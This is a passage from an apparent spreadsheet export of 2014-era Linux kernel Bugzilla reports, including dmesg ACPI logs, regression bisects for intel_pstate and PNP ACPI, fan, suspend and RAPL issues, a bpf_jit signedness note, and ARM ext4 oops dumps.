PCI Express Root Port 1 (rev c4) 00:1c.2 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 3 (rev c4) 00:1c.3 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 4 (rev c4) 00:1d.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation HM77 Express Chipset LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation 7 Series Chipset Family 6-port SATA Controller [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation 7 Series/C210 Series Chipset Family SMBus Controller (rev 04) 01:00.0 VGA compatible controller: NVIDIA Corporation GK107M [GeForce GTX 660M] (rev ff) 03:00.0 Network controller: Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01) 04:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. Device 5289 (rev 01) 04:00.2 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 0a) qba@XNOTE:~$ dmesg |grep -i acpi [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-3.14.5-qba5 root=UUID=ba0f9583-91ca-45de-8b7e-c8f8d1421d80 ro i915.i915_enable_rc6=7 i915.i915_enable_fbc=1 i915.lvds_downclock=1 i915.semaphores=1 drm.vblankoffdelay=1 enable_mtrr_cleanup mtrr_spare_reg_nr=1 mtrr_gran_size=32M mtrr_chunk_size=256M processor.ignore_ppc=1 processor.ignore_tpc=1 acpi_osi=Linux init=/sbin/init i915.modeset=1 i915.semaphores=1 quiet [ 0.000000] BIOS-e820: [mem 0x00000000ca0fc000-0x00000000ca1d1fff] ACPI NVS [ 0.000000] BIOS-e820: [mem 0x00000000ca618000-0x00000000ca65afff] ACPI NVS [ 0.000000] modified: [mem 0x00000000ca0fc000-0x00000000ca1d1fff] ACPI NVS [ 0.000000] modified: [mem 0x00000000ca618000-0x00000000ca65afff] ACPI NVS [ 0.000000] ACPI: RSDP 00000000000f0490 000024 (v02 ALASKA) [ 0.000000] ACPI: XSDT 00000000ca184080 00007C (v01 ALASKA A M I 01072009 AMI 00010013) [ 0.000000] ACPI: FACP 00000000ca18d2d8 00010C (v05 ALASKA A M I 01072009 AMI 00010013) [ 0.000000] ACPI: Override [DSDT- A M I], this is unsafe: tainting kernel [ 0.000000] ACPI: DSDT 00000000ca184190 Logical table override, new table: ffffffff81a66790 [ 0.000000] ACPI: DSDT ffffffff81a66790 009149 (v02 ALASKA A M I 00000021 INTL 20140424) [ 0.000000] ACPI: FACS 00000000ca1d0080 000040 [ 0.000000] ACPI: APIC 00000000ca18d3e8 000092 (v03 ALASKA A M I 01072009 AMI 00010013) [ 0.000000] ACPI: FPDT 00000000ca18d480 000044 (v01 ALASKA A M I 01072009 AMI 00010013) [ 0.000000] ACPI: MCFG 00000000ca18d4c8 00003C (v01 ALASKA A M I 01072009 MSFT 00000097) [ 0.000000] ACPI: SSDT 00000000ca18d508 000EA5 (v01 TrmRef PtidDevc 00001000 INTL 20091112) [ 0.000000] ACPI: HPET 00000000ca18e3b0 000038 (v01 ALASKA A M I 01072009 AMI. 00000005) [ 0.000000] ACPI: SSDT 00000000ca18e3e8 000315 (v01 SataRe SataTabl 00001000 INTL 20091112) [ 0.000000] ACPI: SSDT 00000000ca18e700 000926 (v01 PmRef Cpu0Ist 00003000 INTL 20051117) [ 0.000000] ACPI: SSDT 00000000ca18f028 000A92 (v01 PmRef CpuPm 00003000 INTL 20051117) [ 0.000000] ACPI: SSDT 00000000ca18fac0 000574 (v01 SgRef SgTabl 00001000 INTL 20051117) [ 0.000000] ACPI: SSDT 00000000ca190038 000FAC (v01 OptRef OptTabl 00001000 INTL 20051117) [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: PM-Timer IO Port: 0x408 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x02] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x04] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x06] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x01] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x03] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x05] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x07] enabled) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0xff] high edge lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) [ 0.000000] ACPI: IRQ0 used by override. [ 0.000000] ACPI: IRQ2 used by override. [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] ACPI: HPET id: 0x8086a701 base: 0xfed00000 [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-3.14.5-qba5 root=UUID=ba0f9583-91ca-45de-8b7e-c8f8d1421d80 ro i915.i915_enable_rc6=7 i915.i915_enable_fbc=1 i915.lvds_downclock=1 i915.semaphores=1 drm.vblankoffdelay=1 enable_mtrr_cleanup mtrr_spare_reg_nr=1 mtrr_gran_size=32M mtrr_chunk_size=256M processor.ignore_ppc=1 processor.ignore_tpc=1 acpi_osi=Linux init=/sbin/init i915.modeset=1 i915.semaphores=1 quiet [ 0.000044] ACPI: Core revision 20131218 [ 0.008226] ACPI: All ACPI Tables successfully acquired [ 0.165286] PM: Registering ACPI NVS region [mem 0xca0fc000-0xca1d1fff] (876544 bytes) [ 0.165298] PM: Registering ACPI NVS region [mem 0xca618000-0xca65afff] (274432 bytes) [ 0.165685] ACPI FADT declares the system doesn't support PCIe ASPM, so disable it [ 0.165686] ACPI: bus type PCI registered [ 0.165688] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 [ 0.171888] ACPI: Added _OSI(Module Device) [ 0.171890] ACPI: Added _OSI(Processor Device) [ 0.171891] ACPI: Added _OSI(3.0 _SCP Extensions) [ 0.171892] ACPI: Added _OSI(Processor Aggregator Device) [ 0.171893] ACPI: Added _OSI(Linux) [ 0.174547] ACPI: Executed 1 blocks of module-level executable AML code [ 0.191869] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query honored via cmdline [ 0.192571] ACPI: SSDT 00000000ca025018 00083B (v01 PmRef Cpu0Cst 00003001 INTL 20051117) [ 0.192914] ACPI: Dynamic OEM Table Load: [ 0.192916] ACPI: SSDT (null) 00083B (v01 PmRef Cpu0Cst 00003001 INTL 20051117) [ 0.196201] ACPI: SSDT 00000000ca026a98 000303 (v01 PmRef ApIst 00003000 INTL 20051117) [ 0.196564] ACPI: Dynamic OEM Table Load: [ 0.196566] ACPI: SSDT (null) 000303 (v01 PmRef ApIst 00003000 INTL 20051117) [ 0.199985] ACPI: SSDT 00000000ca027c18 000119 (v01 PmRef ApCst 00003000 INTL 20051117) [ 0.200321] ACPI: Dynamic OEM Table Load: [ 0.200323] ACPI: SSDT (null) 000119 (v01 PmRef ApCst 00003000 INTL 20051117) [ 0.207500] ACPI: Interpreter enabled [ 0.207508] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S1_] (20131218/hwxface-580) [ 0.207512] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S2_] (20131218/hwxface-580) [ 0.207525] ACPI: (supports S0 S3 S4 S5) [ 0.207526] ACPI: Using IOAPIC for interrupt routing [ 0.207550] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug [ 0.207689] ACPI: No dock devices found. [ 0.215944] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-3e]) [ 0.215949] acpi PNP0A08:00: _OSC: OS supports [ExtendedConfig ASPM ClockPM Segments MSI] [ 0.216147] acpi PNP0A08:00: _OSC: platform does not support [PCIeHotplug PME] [ 0.216264] acpi PNP0A08:00: _OSC: OS now controls [AER PCIeCapability] [ 0.216984] pci 0000:00:01.0: System wakeup disabled by ACPI [ 0.217272] pci 0000:00:14.0: System wakeup disabled by ACPI [ 0.217652] pci 0000:00:1a.0: System wakeup disabled by ACPI [ 0.217820] pci 0000:00:1b.0: System wakeup disabled by ACPI [ 0.217981] pci 0000:00:1c.0: System wakeup disabled by ACPI [ 0.218140] pci 0000:00:1c.2: System wakeup disabled by ACPI [ 0.218298] pci 0000:00:1c.3: System wakeup disabled by ACPI [ 0.218501] pci 0000:00:1d.0: System wakeup disabled by ACPI [ 0.219157] pci 0000:01:00.0: System wakeup disabled by ACPI [ 0.221352] pci 0000:03:00.0: System wakeup disabled by ACPI [ 0.223826] pci 0000:04:00.0: System wakeup disabled by ACPI [ 0.226087] acpi PNP0A08:00: Disabling ASPM (FADT indicates it is unsupported) [ 0.226700] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 10 *11 12 14 15) [ 0.226743] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 10 11 12 14 15) *0, disabled. [ 0.226784] ACPI: PCI Interrupt Link [LNKC] (IRQs *3 4 5 6 10 11 12 14 15) [ 0.226824] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 *10 11 12 14 15) [ 0.226865] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 10 11 12 14 15) *0, disabled. [ 0.226904] ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 10 11 12 14 15) *0, disabled. [ 0.226944] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 *5 6 10 11 12 14 15) [ 0.226989] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 *4 5 6 10 11 12 14 15) [ 0.227060] ACPI: Enabled 5 GPEs in block 00 to 3F [ 0.227087] ACPI : EC: GPE = 0x17, I/O: command/status = 0x66, data = 0x62 [ 0.227319] ACPI : EC: 0 stale EC events cleared [ 0.227508] PCI: Using ACPI for IRQ routing [ 0.233042] pnp: PnP ACPI init [ 0.233050] ACPI: bus type PNP registered [ 0.233108] system 00:00: Plug and Play ACPI device, IDs PNP0c01 (active) [ 0.233131] pnp 00:01: Plug and Play ACPI device, IDs PNP0200 (active) [ 0.233147] pnp 00:02: Plug and Play ACPI device, IDs INT0800 (active) [ 0.233228] pnp 00:03: Plug and Play ACPI device, IDs PNP0103 (active) [ 0.233280] system 00:04: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.233311] pnp 00:05: Plug and Play ACPI device, IDs PNP0b00 (active) [ 0.233351] system 00:06: Plug and Play ACPI device, IDs INT3f0d PNP0c02 (active) [ 0.233391] system 00:07: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.233412] pnp 00:08: Plug and Play ACPI device, IDs PNP0c04 (active) [ 0.233436] pnp 00:09: Plug and Play ACPI device, IDs PNP0303 (active) [ 0.233479] pnp 00:0a: Plug and Play ACPI device, IDs ETD0403 PNP0f13 (active) [ 0.234213] system 00:0b: Plug and Play ACPI device, IDs PNP0c02 (active) [ 0.234352] system 00:0c: Plug and Play ACPI device, IDs PNP0c01 (active) [ 0.234364] pnp: PnP ACPI: found 13 devices [ 0.234365] ACPI: bus type PNP unregistered [ 0.940212] ACPI: bus type USB registered [ 0.942363] ACPI: Thermal Zone [TZ0] (42 C) [ 1.286512] ata1.00: ACPI cmd ef/10:06:00:00:00:00 (SET FEATURES) succeeded [ 1.286521] ata1.00: ACPI cmd f5/00:00:00:00:00:00 (SECURITY FREEZE LOCK) filtered out [ 1.286534] ata1.00: ACPI cmd b1/c1:00:00:00:00:00 (DEVICE CONFIGURATION OVERLAY) filtered out [ 1.288850] ata1.00: ACPI cmd ef/10:06:00:00:00:00 (SET FEATURES) succeeded [ 1.288859] ata1.00: ACPI cmd f5/00:00:00:00:00:00 (SECURITY FREEZE LOCK) filtered out [ 1.288863] ata1.00: ACPI cmd b1/c1:00:00:00:00:00 (DEVICE CONFIGURATION OVERLAY) filtered out [ 1.596251] ata2.00: ACPI cmd ef/10:06:00:00:00:00 (SET FEATURES) succeeded [ 1.596254] ata2.00: ACPI cmd f5/00:00:00:00:00:00 (SECURITY FREEZE LOCK) filtered out [ 1.596256] ata2.00: ACPI cmd b1/c1:00:00:00:00:00 (DEVICE CONFIGURATION OVERLAY) filtered out [ 1.597013] ata2.00: ACPI cmd ef/10:06:00:00:00:00 (SET FEATURES) succeeded [ 1.597014] ata2.00: ACPI cmd f5/00:00:00:00:00:00 (SECURITY FREEZE LOCK) filtered out [ 1.597016] ata2.00: ACPI cmd b1/c1:00:00:00:00:00 (DEVICE CONFIGURATION OVERLAY) filtered out [ 3.261137] ACPI: Power Button [PWRB] [ 3.261171] ACPI: Sleep Button [SLPB] [ 3.261658] ACPI Warning: SystemIO range 0x0000000000000428-0x000000000000042f conflicts with OpRegion 0x0000000000000400-0x000000000000047f (\PMIO) (20131218/utaddress-258) [ 3.261666] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 3.261669] ACPI Warning: SystemIO range 0x0000000000000530-0x000000000000053f conflicts with OpRegion 0x0000000000000500-0x0000000000000563 (\GPIO) (20131218/utaddress-258) [ 3.261673] ACPI Warning: SystemIO range 0x0000000000000530-0x000000000000053f conflicts with OpRegion 0x0000000000000500-0x000000000000055f (\_SB_.PCI0.PEG0.PEGP.GPIO) (20131218/utaddress-258) [ 3.261677] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 3.261679] ACPI Warning: SystemIO range 0x0000000000000500-0x000000000000052f conflicts with OpRegion 0x0000000000000500-0x0000000000000563 (\GPIO) (20131218/utaddress-258) [ 3.261682] ACPI Warning: SystemIO range 0x0000000000000500-0x000000000000052f conflicts with OpRegion 0x0000000000000500-0x000000000000055f (\_SB_.PCI0.PEG0.PEGP.GPIO) (20131218/utaddress-258) [ 3.261686] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 3.262562] ACPI: AC Adapter [AC] (on-line) [ 3.277371] ACPI: Battery Slot [BAT] (battery present) [ 3.282286] ACPI: Lid Switch [LID0] [ 3.282332] ACPI: Power Button [PWRF] [ 3.322875] ACPI Warning: SystemIO range 0x000000000000f040-0x000000000000f05f conflicts with OpRegion 0x000000000000f040-0x000000000000f04f (\_SB_.PCI0.SBUS.SMBI) (20131218/utaddress-258) [ 3.322880] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 8.124704] input: ACPI Virtual Keyboard Device as /devices/virtual/input/input21 [ 9.760925] ACPI Warning: \_SB_.PCI0.PEG0.PEGP._DSM: Argument #4 type mismatch - Found [Buffer], ACPI requires [Package] (20131218/nsarguments-95) [ 9.762930] ACPI Warning: \_SB_.PCI0.PEG0.PEGP._DSM: Argument #4 type mismatch - Found [Buffer], ACPI requires [Package] (20131218/nsarguments-95) [ 10.480514] [Firmware Bug]: ACPI(PEGP) defines _DOD but not _DOS [ 10.480541] ACPI: Video Device [PEGP] (multi-head: yes rom: yes post: no) [ 10.480700] ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no) [ 10.514067] acpi device:4c: registered as cooling_device9 Regards Qba</t>
  </si>
  <si>
    <t>iwlwifi inverted description parameter power_save</t>
  </si>
  <si>
    <t>3.14.6</t>
  </si>
  <si>
    <t>2014-06-12 13:11 UTC</t>
  </si>
  <si>
    <t>Andrea Oliveri</t>
  </si>
  <si>
    <t>2014-07-21 08:50 UTC</t>
  </si>
  <si>
    <t>Intel P-State: Constantly changing CPU frequencies on idle system.</t>
  </si>
  <si>
    <t>3.14.7, 3.15-rc8 - 3.15</t>
  </si>
  <si>
    <t>2014-06-13 05:49 UTC</t>
  </si>
  <si>
    <t>2015-07-22 01:11 UTC</t>
  </si>
  <si>
    <t>With the introduction of the kernel patch 3.14.7 and around the release of 3.15-rc8 the idle CPU frequency of each core in an idle system is changing erratically. Before the patch the output of grep MHz /proc/cpuinfo looked like this: cpu MHz : 813.625 cpu MHz : 813.625 cpu MHz : 813.625 cpu MHz : 813.625 After the patch: cpu MHz : 1600.207 cpu MHz : 1600.207 cpu MHz : 1599.847 cpu MHz : 2342.675 The CPU clocks are wildly changing over the complete spectrum of available frequencies. I can reproduce the phenomenon on at least three systems: Desktop PC with Sandy-Bridge CPU: Intel i7-2600 (non-K) Lenovo T530 with Ivy-Bridge CPU: i7-3610QM Sony VAIO Pro 13 (example above) with Haswell CPU: i5-4200U For me it is not clear whether this is expected behavior and I just hit some kind of heisenbug or something is going wrong. Primarily I report this because I noticed a significant sudden change. I haven't done any tests regarding performance, battery run-time or heat implications yet. Note: I've seen this kind of behavior in earlier kernel releases before, but with 3.14 it vanished completely. So this might be a regression.</t>
  </si>
  <si>
    <t>BISECTED regression "intel_pstate: Set turbo VID for BayTrail" causes stall on Intel NUC DN2820FYKH</t>
  </si>
  <si>
    <t>2014-06-15 13:45 UTC</t>
  </si>
  <si>
    <t>2015-07-22 01:08 UTC</t>
  </si>
  <si>
    <t>The hardware: DN2820FYKH (BIOS version:0028) The symptom: The kernel stalls at "Loading, please wait" or sometimes at the the next line where udevd is launched. I did a bisect which identified the commit 21855ff5bcbdd075e1c99772827a84912ab083dd "intel_pstate: Set turbo VID for BayTrail" as the cause. I also confirmed it by reverting the commit on v3.15 which fixed the stall.</t>
  </si>
  <si>
    <t>Lower fan speeds are forgotten after resume from ram/disk</t>
  </si>
  <si>
    <t>3.12 - 4.4</t>
  </si>
  <si>
    <t>2014-06-17 21:23 UTC</t>
  </si>
  <si>
    <t>Manuel Krause</t>
  </si>
  <si>
    <t>2016-01-25 02:48 UTC</t>
  </si>
  <si>
    <t>I've found this issue _after_ helping to debug https://bugzilla.kernel.org/show_bug.cgi?id=71711 My System is a Core 2 Duo Notebook HP Compaq 6730b. (More from the dmesg below.) When freshly booting my system, and using it, the fan is working fine, adding something CPU stressing like worldcommunitygrid, also no problem. Suspending the system to RAM / disk and resuming results in: My fan only triggers the next possible fan level(s) after resume. If I immediately resume with a still hot system, I'd get only the 75°C step or as next the emergency cooling. Dropping the CPU load with a so resumed system makes the fan go off. Then at, say 75°C, the fan does it's work again until the related low trigger temperature for this trip point is met and the fan goes off again. This may be dangerous for systems that suspend and resume above the last met temperature for a trip point. What can be high! Resuming a colder system results in lower temperatures to be taken as next fan kick in, then lower trip points are reckognized over runtime after suspend. Zhang Rui advised me to attach following files: attach output of "grep . /sys/class/thermal/thermal_zone*/cdev*/device/path" attach output of "grep . /sys/class/thermal/cdev*/device/path" run "echo 'module thermal_sys +fp' &gt; /sys/kernel/debug/dynamic_debug/control" reproduce the problem attach the dmesg output and tmon output So, I'd do now.</t>
  </si>
  <si>
    <t>mips/net/bpf_jit.c:1337: poor choice of variable type ?</t>
  </si>
  <si>
    <t>3.16-rc5</t>
  </si>
  <si>
    <t>2014-07-16 17:13 UTC</t>
  </si>
  <si>
    <t>2015-07-09 22:47 UTC</t>
  </si>
  <si>
    <t>[linux-3.16-rc5/arch/mips/net/bpf_jit.c:1337]: (style) Checking if unsigned variable 'off' is less than zero. Source code is off = pkt_type_offset(); if (off &lt; 0) return -1; but unsigned int i, off, load_order, condt; and static int pkt_type_offset(void) Suggest put the return type from pkt_type_offset into a signed variable, test that &lt; 0, then use a cast to get the value into an unsigned variable. Something like signedVar = pkt_type_offset(); if (signedVar &lt; 0) return -1; off = (unsigned int) signedVar;</t>
  </si>
  <si>
    <t>2015-04-04 19:52 UTC</t>
  </si>
  <si>
    <t>3.16-rcX crashes on resume from Suspend-To-RAM - Dell M4400</t>
  </si>
  <si>
    <t>3.16-rc1</t>
  </si>
  <si>
    <t>2014-07-22 14:14 UTC</t>
  </si>
  <si>
    <t>2014-08-19 14:27 UTC</t>
  </si>
  <si>
    <t>From: markus@gutschke.com &gt; My Dell M4400 has been pretty well-supported by Linux a couple of &gt; years now, but recent 3.16-rcX cause hard crashes when resuming from &gt; Suspend-to-RAM. &gt; &gt; This is tricky to debug, as device drivers are not yet restored by the &gt; time that the crash happens. So, I can't use Page-UP to scroll the &gt; screen and see the full crash information. I also cannot use the &gt; netconsole; the ethernet device is still suspended. For similar &gt; reasons, crash kernels don't seem to work either. &gt; &gt; After about a day of false starts and a lengthy bi-secting session, I &gt; finally narrowed things down to this change list: &gt; &gt; eec15edbb0e14485998635ea7c62e30911b465f0 is the first bad commit &gt; commit eec15edbb0e14485998635ea7c62e30911b465f0 &gt; Author: Zhang Rui &lt;rui.zhang@intel.com&gt; &gt; Date: Fri May 30 04:23:01 2014 +0200 &gt; &gt; ACPI / PNP: use device ID list for PNPACPI device enumeration &gt; &gt; ACPI can be used to enumerate PNP devices, but the code does not &gt; handle this in the right way currently. Namely, if an ACPI device &gt; object &gt; 1. Has a _CRS method, &gt; 2. Has an identification of &gt; "three capital characters followed by four hex digits", &gt; 3. Is not in the excluded IDs list, &gt; it will be enumerated to PNP bus (that is, a PNP device object will &gt; be create for it). This means that, actually, the PNP bus type is &gt; used as the default bus type for enumerating _HID devices in ACPI. &gt; &gt; However, more and more _HID devices need to be enumerated to the &gt; platform bus instead (that is, platform device objects need to be &gt; created for them). As a result, the device ID list in acpi_platform.c &gt; is used to enforce creating platform device objects rather than PNP &gt; device objects for matching devices. That list has been continuously &gt; growing recently, unfortunately, and it is pretty much guaranteed to &gt; grow even more in the future. &gt; &gt; To address that problem it is better to enumerate _HID devices &gt; as platform devices by default. To this end, change the way of &gt; enumerating PNP devices by adding a PNP ACPI scan handler that &gt; will use a device ID list to create PNP devices for the ACPI &gt; device objects whose device IDs are present in that list. &gt; &gt; The initial device ID list in the PNP ACPI scan handler contains &gt; all of the pnp_device_id strings from all the existing PNP drivers, &gt; so this change should be transparent to the PNP core and all of the &gt; PNP drivers. Still, in the future it should be possible to reduce &gt; its size by converting PNP drivers that need not be PNP for any &gt; technical reasons into platform drivers. &gt; &gt; Signed-off-by: Zhang Rui &lt;rui.zhang@intel.com&gt; &gt; [rjw: Rewrote the changelog, modified the PNP ACPI scan handler code] &gt; Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; &gt; Reviewed-by: Mika Westerberg &lt;mika.westerberg@linux.intel.com&gt; &gt; &gt; :040000 040000 &gt; b7c07232aa46ae7b6faf9a907fb7274a02e4680fc2e05b31a61dccd087c554adecc89a &gt; 43a1ed81f7 &gt; M drivers &gt; :040000 040000 &gt; 4eda970292fffbeebe167f9210502527df4e8ab421e9e6fd84c780a34bf3d48b5e7618 &gt; b551da3b1a &gt; M include &gt; &gt; I took a photo of the crash. It feels silly to do, but I couldn't &gt; think of a better solution. You can find it at &gt; https://drive.google.com/file/d/0B8SxqKDe4hyheTlTLXY2YThkMXM &gt; &gt; As I mentioned earlier, a bunch of information has already scrolled &gt; off the screen, but hopefully what is visible is somewhat helpful. &gt; &gt; I will have only limited internet access the next couple of weeks. But &gt; I wanted to make sure I at least got the result of the bisection out &gt; to LKML. I will make every best effort to collect additional data, if &gt; asked to do so; but some of it might be delayed for a little bit, &gt; until I can get access to reasonably powerful hardware or reasonably &gt; fast internet. &gt;</t>
  </si>
  <si>
    <t>intel_rapl: RAPL domain dram detection failed</t>
  </si>
  <si>
    <t>2014-07-23 02:03 UTC</t>
  </si>
  <si>
    <t>2014-10-13 02:29 UTC</t>
  </si>
  <si>
    <t>Jacob Pan</t>
  </si>
  <si>
    <t>Open report en launchpad.net https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1347324 [ 5.303701] intel_rapl: RAPL domain dram detection failed</t>
  </si>
  <si>
    <t>read of /dev/urandom causes kernel panic</t>
  </si>
  <si>
    <t>3.15.4</t>
  </si>
  <si>
    <t>2014-07-23 10:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 144001 [details] trace photo Third time in two days my kernel panics while issuing the following command as user: dd if=/dev/urandom of=myfile bs=100M count=1 Everytime the trace looks more or less like the one attached. Sorry if this is not cpuidle related, it's just a guess on my side based on the trace.</t>
  </si>
  <si>
    <t>WARNING: CPU: 23 PID: 1 at drivers/pnp/pnpacpi/core.c:76 pnpacpi_set_resources+0x9a/0x134()</t>
  </si>
  <si>
    <t>&gt;= 3.14-rc1</t>
  </si>
  <si>
    <t>2014-07-28 21:22 UTC</t>
  </si>
  <si>
    <t>Vinson Lee</t>
  </si>
  <si>
    <t>2015-07-28 15:16 UTC</t>
  </si>
  <si>
    <t>------------[ cut here ]------------ WARNING: CPU: 23 PID: 1 at drivers/pnp/pnpacpi/core.c:76 pnpacpi_set_resources+0x9a/0x134() Modules linked in: CPU: 23 PID: 1 Comm: swapper/0 Not tainted 3.16.0-rc7 #1 0000000000000000 ffff8808541cfc78 ffffffff814faf17</t>
  </si>
  <si>
    <t>EXT-4 kernel panic</t>
  </si>
  <si>
    <t>2014-07-31 21:08 UTC</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>2014-08-03 17:05 UTC</t>
  </si>
  <si>
    <t>[ 21.066870] Unable to handle kernel paging request at virtual address 013d5000 [ 21.066932] pgd = eb138000 [ 21.067026] [013d5000] *pgd=00000000 [ 21.067131] Internal error: Oops: 5 [#1] PREEMPT SMP ARM [ 21.067185] CPU: 1 Not tainted (3.4.0-purity #5) [ 21.067284] PC is at __percpu_counter_add+0x4c/0xd8 [ 21.067341] LR is at __sb_start_write+0x60/0x104 [ 21.067435] pc : [&lt;c042bd68&gt;] lr : [&lt;c0269fb4&gt;] psr: 80000013 [ 21.067438] sp : ebb53e38 ip : 00000020 fp : ebb53e5c [ 21.067572] r10: 00000000 r9 : ebb52000 r8 : c103c0d8 [ 21.067624] r7 : ec0d51e8 r6 : ebb52000 r5 : 00000000 r4 : 00000001 [ 21.067717] r3 : 00000000 r2 : 00000020 r1 : 00000000 r0 : 013d5000 [ 21.067772] Flags: Nzcv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user [ 21.067867] Control: 10c5787d Table: 3353806a DAC: 00000015 [ 21.067960] [ 21.067962] PC: 0xc042bce8: [ 21.068058] bce8 e3a01004 ebff88b2 e5983000 e1a02000 e1530000 cafffff4 e1c640f8 e1a00006 [ 21.068584] bd08 eb187c15 e89daff8 c103b868 c103c0d8 c0b093f8 e1a0c00d e92dddf0 e24cb004 [ 21.069067] bd28 e1a0100d e1a05003 e59bc004 e3c16d7f e1a07000 e3c6603f e1a04002 e5963004 [ 21.069555] bd48 e2833001 e5863004 e59f8098 e1a03fcc e1a0200c e5960014 e5971018 e7980100 [ 21.070081] bd68 e791a000 e094400a e0a55fca e1540002 e0d5a003 aa000006 e26cc000 e1a03fcc [ 21.070603] bd88 e1a0200c e1520004 e0d3c005 b7814000 ba00000c e1a00007 eb187b79 e1c720d8 [ 21.071090] bda8 e1a00007 e596c014 e5971018 e0922004 e0a33005 e1c720f8 e798310c e3a02000 [ 21.071621] bdc8 e7812003 eb187be4 e5963004 e2433001 e5863004 e5963000 e3130002 089dadf0 [ 21.072163] [ 21.072164] LR: 0xc0269f34: [ 21.072262] 9f34 0a000003 e3a01003 e3a02001 e3a03000 ebfd6812 e24bd010 e89da810 c103c214 [ 21.072808] 9f54 e1a0c00d e92dddf0 e24cb004 e24dd020 e52de004 e8bd4000 e1a0300d e59f80d8 [ 21.073366] 9f74 e1a04000 e3c37d7f e1a05001 e1a06002 e3c7703f e5943214 e1530005 aa00000e [ 21.073861] 9f94 e59f10b8 e0840285 e3a02001 e3a03000 e2800f62 e5911000 e58d1000 eb070759 [ 21.074391] 9fb4 f57ff05f e5943214 e1550003 da00001c e3a00001 e24bd024 e89dadf0 e3560000 [ 21.074923] 9fd4 0a00001b e3a02014 e24b0038 e3a01000 e284af86 eb0691cc e597300c e24b202c [ 21.075411] 9ff4 e50b8030 e50b202c e50b2028 e50b3034 ea000000 eb1f7f2e e1a0000a e24b1038 [ 21.075939] a014 e3a02002 ebfd2a7b e5943214 e1550003 dafffff7 e1a0000a e24b1038 ebfd2ab7 [ 21.076499] [ 21.076501] SP: 0xebb53db8: [ 21.076602] 3db8 00200200 00000000 00000000 c042bd68 80000013 ffffffff ebb53e24 c103c0d8 [ 21.077137] 3dd8 ebb52000 00000000 ebb53e5c ebb53df0 c0106f98 c0100234 013d5000 00000000 [ 21.077688] 3df8 00000020 00000000 00000001 00000000 ebb52000 ec0d51e8 c103c0d8 ebb52000 [ 21.078325] 3e18 00000000 ebb53e5c 00000020 ebb53e38 c0269fb4 c042bd68 80000013 ffffffff [ 21.078995] 3e38 ec0d5000 00000003 00000001 ebb52000 c01b4c34 00000000 ebb53ea4 ebb53e60 [ 21.079648] 3e58 c0269fb4 c042bd28 00000020 ea8e10b8 c0b1a3f0 c0107644 ebb52000 00000000 [ 21.080314] 3e78 ebb53ea4 ebb53e88 ea8e10b8 ea8e1158 ea8e10b8 c0b1a3f0 c0107644 00000000 [ 21.080885] 3e98 ebb53ecc ebb53ea8 c02fd064 c0269f60 00000000 ea8e10b8 ea8e10b8 ea8e1158 [ 21.081549] [ 21.081550] FP: 0xebb53ddc: [ 21.081687] 3ddc 00000000 ebb53e5c ebb53df0 c0106f98 c0100234 013d5000 00000000 00000020 [ 21.082323] 3dfc 00000000 00000001 00000000 ebb52000 ec0d51e8 c103c0d8 ebb52000 00000000 [ 21.082926] 3e1c ebb53e5c 00000020 ebb53e38 c0269fb4 c042bd68 80000013 ffffffff ec0d5000 [ 21.083570] 3e3c 00000003 00000001 ebb52000 c01b4c34 00000000 ebb53ea4 ebb53e60 c0269fb4 [ 